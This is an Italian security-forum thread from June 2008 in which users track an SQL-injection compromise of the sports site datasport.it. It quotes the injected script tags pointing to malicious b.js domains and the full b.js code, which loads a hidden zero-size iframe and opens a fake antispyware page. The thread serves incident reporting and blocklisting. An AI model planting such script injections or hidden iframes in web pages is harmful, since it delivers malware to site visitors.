Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > News - AV e sicurezza

Recensione REDMAGIC Astra Gaming Tablet: che spettacolo di tablet!
Recensione REDMAGIC Astra Gaming Tablet: che spettacolo di tablet!
Il REDMAGIC Astra Gaming Tablet rappresenta una rivoluzione nel gaming portatile, combinando un display OLED da 9,06 pollici a 165Hz con il potente Snapdragon 8 Elite e un innovativo sistema di raffreddamento Liquid Metal 2.0 in un form factor compatto da 370 grammi. Si posiziona come il tablet gaming più completo della categoria, offrendo un'esperienza di gioco senza compromessi in mobilità.
Dopo un mese, e 50 foto, cosa abbiamo capito della nuova Nintendo Switch 2
Dopo un mese, e 50 foto, cosa abbiamo capito della nuova Nintendo Switch 2
Dopo un mese di utilizzo intensivo e l'analisi di oltre 50 scatti, l'articolo offre una panoramica approfondita di Nintendo Switch 2. Vengono esaminate le caratteristiche che la definiscono, con un focus sulle nuove funzionalità e un riepilogo dettagliato delle specifiche tecniche che ne determinano le prestazioni
Gigabyte Aero X16 Copilot+ PC: tanta potenza non solo per l'IA
Gigabyte Aero X16 Copilot+ PC: tanta potenza non solo per l'IA
Un notebook che punta sull'abbinamento tra potenza di calcolo, schermo ampio e dimensioni nel complesso compatte. Gigabyte Aero X16 Copilot+ PC si trasporta facilmente, vanta buona autonomia con batteria e offre tanto grazie alla piattaforma AMD Ryzen AI e alla scheda video NVIDIA GeForce RTX 5070 Laptop tanto per un utilizzo professionale come per intrattenersi.
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 05-06-2008, 09:00   #1
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28899
[NEWS]Sito datasport.it ulteriormente compromesso

Giovedì 5 gugno 2008

Nel momento in cui scrivo il sito Datasport.it,sezione news calcio serie A, è stato ulteriormente violato: presenti redirect ai siti:
Quote:
http://www.encode72.com/b.js
http://www.view89.com/b.js
http://www.exec51.com/b.js
http://www.sslnet72.com/b.js
http://www.sslnet72.com/b.js
http://www.sslnet72.com/b.js
http://www.win496.com/b.js
Tali script se non ho letto male(putroppo a lavoro non ho i mezzi adatti ad approfondire la cosa)reindirizzano a un falso antispyware e,cosa più pericolosa,a domini in cui è hostato l'MBR Sinowal.

Ho già provveduto a segnalare la cosa a datasport.it(ore 10:05).
Avira premium con webguard attivo non segnala nulla di anomalo riguardo lo script

Consiglio a chi utilizza Internet Explorer e l'analisi completa del sistema,idem per chi utilizza Firefox SENZA l'estensione NoScript installata e attiva.

Link all'analisi dello script su virustotal.com
Contenuto dello script su datasport.it
Quote:
<script src=http://www.view89.com/b.js></script><script src=http://www.encode72.com/b.js></script><script src=http://www.exec51.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.win496.com/b.js></script></a></span></div>
Contentuto dello script in oggetto:
Quote:
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("bannerupdate=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "bannerupdate=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=http://exec51.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
window.open("http://www.advancedxpdefender.com/sysscan/f3dd61256dd53c3ff34e20b256b505fa/1/",'defender',"toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=1024,height=600,top=10,left=10");
}
catch(e)
{
};
}
Il tutto dopo quanto era successo Lunedì 2 giugno come potete leggere qui ...anche questo problema segnalato in quella stessa data senza aver ottenuto uno straccio di risposta ma cosa ben più grave senza che chi si occupa del portale non abbia provveduto a correre ai ripari nè per ripulire il codice delle varie sezioni del portale nè per eliminare eventuali falle nei software utilizzati
Seguiranno aggiornamenti

Ultima modifica di juninho85 : 05-06-2008 alle 10:32.
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 10:21   #2
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28899
Questo il contenuto infetto della Homepage:
Quote:
script src=http://www.err68.com/b.js></script><script src=http://www.sslput4.com/b.js></script><script src=http://www.exe94.com/b.js></script><script src=http://www.exec51.com/b.js></script><script src=http://www.win496.com/b.js></script>
altra porzione sulla medesima riga:
Quote:
<script src=http://www.err68.com/b.js></script><script src=http://www.exe94.com/b.js></script>
idem come sopra:
Quote:
<script src=http://www.err68.com/b.js></script><script src=http://www.sslput4.com/b.js></script><script src=http://www.exe94.com/b.js></script><script src=http://www.exec51.com/b.js></script><script src=http://www.win496.com/b.js></script>
Quote:
<script src=http://www.err68.com/b.js></script><script src=http://www.exe94.com/b.js></script>
Quote:
<script src=http://www.err68.com/b.js></script><script src=http://www.exe94.com/b.js></script>
Quote:
<script src=http://www.err68.com/b.js></script><script src=http://www.sslput4.com/b.js></script><script src=http://www.exe94.com/b.js></script><script src=http://www.exec51.com/b.js></script><script src=http://www.win496.com/b.js></script>
Quote:
<script src=http://www.err68.com/b.js></script><script src=http://www.exe94.com/b.js></script>

sembrerebbe che i link scritti nel codice con sql injection cambi a seconda della sezione che si consulta

Ultima modifica di juninho85 : 05-06-2008 alle 10:25.
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 10:37   #3
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28899
dettagli:di tutti i siti in cui è stato fatto un defacement inserendo le scritte
Quote:
hacked by RedRolix sari_seytan And LupuS Rebel Group NOWAR
datasport.it mi risulta essere l'unico che ha subito l'ondata di sql injection con redirect a domini esterni
Questo mi fa supporre che datasport.it abbia subito due attacchi da diversi autori
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 10:47   #4
Edgar Bangkok
Senior Member
 
L'Avatar di Edgar Bangkok
 
Iscritto dal: Sep 2007
Messaggi: 467
Datasport

Sito Datasport Ora sono script pericolosi
Juninho85 mi segnala che il portale italiano di sport Datasport presenta segni di un nuovo attacco di hacking ma questa volta di gran lunga piu' pericoloso dell'attacco di qualche giorno fa'
In precedenza si era verificata la presenza di numerose pagine su dominio datasport.it che presentavano il messaggio “hacked by RedRolix .......” e concludendo il post scrivevo:
“........... l'analisi de codice sorgente delle pagine colpite non rivela altri problemi a parte la scritta di hacking il che fa pensare che si tratti solo di una azione dimostrativa come avviane quotidianamente su parecchi siti anche .IT ..............Rimane comunque la gravita' del fatto in quanto dimostra una vulnerabilita' dei siti o dei server che li ospitano che potrebbe essere sfruttata per azioni ben piu' pericolose. (redirect a malware, pagine con exploit ecc...) .......”
In effetti sta succedendo proprio questo e sia Datasport che altri domini sempre ad esso collega sul medesimo ip hostano adesso pericolosi scirpt che linkano a malware ma non solo
Ecco un report eseguito con webscanner:
dove si vede la grande quantita' di script presenti su varie url tutte collegate a datasport (questa volta nascosti nel codice e non visibili nel layout della pagina) e questo il sorgente di una pagina
Per quanto si riferisce al codice dello script
oltre al pericoloso link a pagina con explot abbiamo il link ad un sito antimalware fasullo che, ad aumentare il pericolo, se ce ne fosse bisogno, a differenza dei siti di rogue applications questa volta, anche lui, distribuisce malware e non semplice applicazione fasulla.
Questo il report VT
Quello che sorprende dell'attacco e' la grande quantita' di nomi diversi di pagine a cui puntano gli scripts e comunque e' quasi certo che datasport non sara' l'unico dominio attaccato ma sicuramente anche altri siti .IT subiranno medesima sorte.

A mio avviso comunque non sono le stesse persone che hanno fatto l hacking precedente, come scrivo sul blog.
A chi esegue questi attacchi non conviene farsi pubblicita' con proclami sulle pagine attaccate ma se mai agire ben nascosto ottenendo il massimo della distribuzione di malware.
Il fatto delle scritte di hacking precedenti segnala comunque che erano tutti siti (o server) facilmente" bucabili"


Edgar
Edgar Bangkok è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 10:52   #5
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28899
Quote:
Originariamente inviato da Edgar Bangkok Guarda i messaggi
A mio avviso comunque non sono le stesse persone che hanno fatto l hacking precedente, come scrivo sul blog.
A chi esegue questi attacchi non conviene farsi pubblicita' con proclami sulle pagine attaccate ma se mai agire ben nascosto ottenendo il massimo della distribuzione di malware.
Il fatto delle scritte di hacking precedenti segnala comunque che erano tutti siti (o server) facilmente" bucabili"


Edgar
mi trovi perfettamente d'accordo,come puoi leggere sopra...probabilmente c'è stato una sorta di passaparola tra malintenzionati...
se ti possibile sarebbe molto utile raccogliere l'insieme dei domini presenti nelle varie sezioni del portale in modo da poterli inserire in blocklist
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 11:30   #6
Edgar Bangkok
Senior Member
 
L'Avatar di Edgar Bangkok
 
Iscritto dal: Sep 2007
Messaggi: 467
Datasport

Sembra che ora Datasport sia offiline
Forse provvederanno a bonificare il sito.
A me comunque risultavano questi script presenti sulle pagine

Codice:
<script src=http://www.en-us18.com/b.js>
<script src=http://www.libid53.com/b.js>
<script src=http://www.rundll92.com/b.js>
<script src=http://www.redir94.com/b.js>
<script src=http://www.locale48.com/b.js>
<script src=http://www.err68.com/b.js>
<script src=http://www.sslput4.com/b.js>
<script src=http://www.exe94.com/b.js>
<script src=http://www.exec51.com/b.js>
<script src=http://www.win496.com/b.js>
<script src=http://www.sslnet72.com/b.js>
di cui alcuni presenti ad esempio sulla lista di malwaredomains
(img sul blog)

Edgar

http://edetools.blogspot.com/

Ultima modifica di Edgar Bangkok : 05-06-2008 alle 11:34.
Edgar Bangkok è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 11:34   #7
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
A me risulta online, ma stanno pulendo a razzo
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 11:39   #8
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28899
la sezione news serie A calcio è stata ripulita,come anche la homepage(che poi son le 2 pagine da noi segnalate)...sul resto delle sezioni non è cambiato nulla PER ORA
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 12:27   #9
GmG
Senior Member
 
L'Avatar di GmG
 
Iscritto dal: Aug 2006
Città: Riviera del Brenta
Messaggi: 2048
Quote:
Originariamente inviato da juninho85 Guarda i messaggi
Giovedì 5 gugno 2008

[CUT]
Tali script se non ho letto male(putroppo a lavoro non ho i mezzi adatti ad approfondire la cosa)reindirizzano a un falso antispyware e,cosa più pericolosa,a domini in cui è hostato l'MBR Sinowal.

[CUT]
E' l'asprox botnet e non il Sinowal (l' unica cosa in comune è che utilizzano lo stesso kit per exploit (Neosploit)).
GmG è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 12:29   #10
Edgar Bangkok
Senior Member
 
L'Avatar di Edgar Bangkok
 
Iscritto dal: Sep 2007
Messaggi: 467
datasport

Sono passate 2 ore, rifacendo una scansione di script ne trovo quasi piu' di prima
Siete sicuri che la home e' bonificata ???

Edgar
Edgar Bangkok è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 12:42   #11
Ignorante Informatico
Senior Member
 
L'Avatar di Ignorante Informatico
 
Iscritto dal: Apr 2008
Messaggi: 1279
Quando si dice che c'è del marcio in Serie A ...
Ignorante Informatico è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 15:58   #12
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28899
Quote:
Originariamente inviato da Edgar Bangkok Guarda i messaggi
Sono passate 2 ore, rifacendo una scansione di script ne trovo quasi piu' di prima
Siete sicuri che la home e' bonificata ???

Edgar
è stata bonificata(vista con i miei occhi)e poi pare sia stata rimodificata
la sezione basket/homepage(anch'essa infettata in mattinata)risulta non disponibile
la sezione news calcio serie A è stata ripulita
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 17:25   #13
Edgar Bangkok
Senior Member
 
L'Avatar di Edgar Bangkok
 
Iscritto dal: Sep 2007
Messaggi: 467
datasport

Al momento , 11.22 PM Thai (6.22 PM Ita) la home datasport e' tornata pulita ma una scansione rileva ancora almeno una trentina di scripts sparsi su 4 pagine (due pagine su sportmoviestv )

Edgar
Edgar Bangkok è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 20:09   #14
GmG
Senior Member
 
L'Avatar di GmG
 
Iscritto dal: Aug 2006
Città: Riviera del Brenta
Messaggi: 2048
Nuovamente infetto
GmG è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 20:29   #15
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Quote:
Originariamente inviato da GmG Guarda i messaggi
Nuovamente infetto
Gia, ma che cosa stanno combinando
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 20:48   #16
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28899
Quote:
Originariamente inviato da GmG Guarda i messaggi
Nuovamente infetto
in quali pagine?io ora sto visualizzando le news calcio serie a e non vedo nulla...
la homepage del basket ormai non è più raggiungibili così come molte altre aree(chissà se per manutenzione o per altri motivi...) da diverse ore,mentre la home del portale risulta essere pulita
intanto la segnalazione dello script malevolo ad avira non è andato a buon fine,per loro è tutto ok!
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 21:01   #17
GmG
Senior Member
 
L'Avatar di GmG
 
Iscritto dal: Aug 2006
Città: Riviera del Brenta
Messaggi: 2048
Nell' HomePage del sito ci sono

Codice:
http://www.sslnet72.com/b.js
http://www.view89.com/b.js
GmG è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2008, 21:07   #18
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28899
confermo
intanto su 213.156.44.204,IP in cui oltre a datasport.it si trovano altri 7 domini,risultano nella medesima situazione www.STEFANOLAVORI.COM e
www.DATABASKET.NET(facente parte sempre di datasport)
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 06-06-2008, 02:35   #19
Edgar Bangkok
Senior Member
 
L'Avatar di Edgar Bangkok
 
Iscritto dal: Sep 2007
Messaggi: 467
datasport

Questa mattina , ora thai, (le 3 AM del 6 giugno in Italia) ho riverificato il sito dtasport
Ci sono ancora alcune pagine con scripts per un totale di 176 presenze del codice
Ho messo un aggiornamento del report su blog
http://edetools.blogspot.com/

Per il fatto che dopo che era bonificato veniva di nuovo colpito penso che 'curassero' i sintomi dell'attacco (ripristinando qualche backup) ma non le cause... e quindi tutto ritornasse come prima.

Edgar
Edgar Bangkok è offline   Rispondi citando il messaggio o parte di esso
Old 06-06-2008, 09:37   #20
Edgar Bangkok
Senior Member
 
L'Avatar di Edgar Bangkok
 
Iscritto dal: Sep 2007
Messaggi: 467
scripts

Ad una verifica eseguita nuovamnete dopo qualche ora (10.30 am in italia) s sembra che il numero di scripts presenti sia ancora abbastanza elevato.

Ci sono in totale , nelle pagine controllate, 267 scripts.
(report aggiornato sul blog)

Edgar

http://edetools.blogspot.com/
Edgar Bangkok è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Recensione REDMAGIC Astra Gaming Tablet: che spettacolo di tablet! Recensione REDMAGIC Astra Gaming Tablet: che spe...
Dopo un mese, e 50 foto, cosa abbiamo capito della nuova Nintendo Switch 2 Dopo un mese, e 50 foto, cosa abbiamo capito del...
Gigabyte Aero X16 Copilot+ PC: tanta potenza non solo per l'IA Gigabyte Aero X16 Copilot+ PC: tanta potenza non...
vivo X200 FE: il top di gamma si è fatto tascabile? vivo X200 FE: il top di gamma si è fatto ...
TCL 65C7K, televisore Mini-LED di qualità, versatile e dal prezzo competitivo TCL 65C7K, televisore Mini-LED di qualità...
Riportare in vita un uccello gigante est...
GlobalFoundries vuole fare i chip? La ve...
Le offerte Amazon del weekend fan tremar...
Dopo l'abbuffata del Prime Day ci sono a...
The Witcher IV non è ancora uscit...
Videosorveglianza 4K e batteria solare: ...
A 179€ è imbattibile: tablet 11" 2,5K, 8...
Monitor da urlo in offerta su Amazon: tr...
Il boom azionario di NVIDIA sta rendendo...
Elegante, senza cornici, 91€: in offerta...
ZX Spectrum: quali erano i 10 giochi più...
GPU NVIDIA vulnerabili a GPUHammer: l'at...
Podcast e musica senza estraniarsi dal m...
Ecco come Elon Musk intende controllarvi...
BYD rivoluziona (ancora) il settore auto...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 14:29.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Served by www2v